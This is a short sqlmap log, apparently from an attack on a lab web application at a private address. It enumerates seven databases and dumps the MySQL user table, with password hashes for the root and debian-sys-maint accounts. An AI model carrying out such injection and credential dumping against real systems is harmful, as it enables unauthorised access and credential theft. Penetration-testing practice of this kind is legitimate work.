        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] php_fusion
[*] test
[*] vuln_app
[*] weblab01

[11:58:30] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.18'
[*] ending @ 11:58:30 /2020-09-29/

mysql:
+------------------+-------------------------------------------+
| user             | Password                                  |
+------------------+-------------------------------------------+
| <blank>          | <blank>                                   |
| <blank>          | <blank>                                   |
| debian-sys-maint | *BA4285BA9A3128A6D0930DEFA0623E59E974DCC8 |
| root             | *C398D21384A42CEF179B1A39589A0C2BEF854E88 |
| root             | *C398D21384A42CEF179B1A39589A0C2BEF854E88 |
| root             | *C398D21384A42CEF179B1A39589A0C2BEF854E88 |
| root             | *C398D21384A42CEF179B1A39589A0C2BEF854E88 |
| root             | *C398D21384A42CEF179B1A39589A0C2BEF854E88 |
+------------------+-------------------------------------------+

[12:05:45] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.18/dump/mysql/user.csv'
[12:05:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.18'

[*] ending @ 12:05:45 /2020-09-29/

